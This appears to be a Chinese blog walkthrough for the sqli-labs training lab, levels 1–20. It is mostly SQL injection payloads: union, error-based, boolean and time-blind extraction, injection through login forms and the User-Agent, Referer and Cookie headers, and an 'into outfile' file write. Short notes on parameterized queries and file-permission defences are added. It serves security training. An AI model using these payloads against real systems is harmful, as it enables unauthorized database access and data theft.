  • sqlilabs 1-20关 payload

    1、
    联合查询注入(成因:id 参数被直接拼接进 SQL 语句,且页面会回显查询结果;根本修复是使用参数化查询/预编译语句,而不是过滤个别字符):
    爆库名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),3 --+
    爆表名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
    爆列名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
    爆数据:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+

    2、
    同1
    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3

    3、
    同1
    http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+

    4、
    同1
    http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,user(),3 --+

    5、
    报错注入:
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+

    布尔盲注:
    http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ 或 http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+(substr(str,pos,len) 从第 pos 个字符开始截取 len 个字符,这里每次只取一个字符进行比较)
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+

    时间盲注:
    http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+


    6、
    同5
    http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
    http://127.0.0.1/sqli/Less-6/?id=1" and left(version(),1)=5 --+

    7、
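    http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\phpStudy\PHPTutorial\WWW\sqli\Less-7\1.txt"#
    说明:into outfile 只有在数据库账号拥有 FILE 权限、且 secure_file_priv 允许写入目标目录时才会成功。防御上应将 secure_file_priv 设为 NULL 或受限目录,不给应用所用的数据库账号授予 FILE 权限,并且不让数据库进程对 Web 目录有写权限。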

    8、
    同5 布尔或时间盲注(无错误回显,所以无法报错注入)
    http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+

    9、
    同5 时间盲注

    10、
    同5 双引号闭合 时间盲注
    http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+

    11、
    POST注入 (万能密码)
    联合查询注入/报错注入/盲注??
    admin' order by 3 #
    1' union select user(),database() #


    12、
    1") union select user(),database() #

    13、
    报错注入
    1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

    14、
    双引号闭合
    1" and updatexml(1,concat(0x7e,database(),0x7e),1) #

    15、
    布尔盲注
    admin' and length(database())>1 #


    16、
    时间盲注
    admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #

    17、
    报错注入
    username:admin
    password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

    18、
    User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

    19、
    Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1


    20、
    Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #
    说明(18-20关):User-Agent、Referer、Cookie 等请求头同样是客户端可控的不可信输入,写入或拼接进 SQL 之前必须和表单参数一样使用参数化查询。

  • 原文地址:https://www.cnblogs.com/shisana/p/13272834.html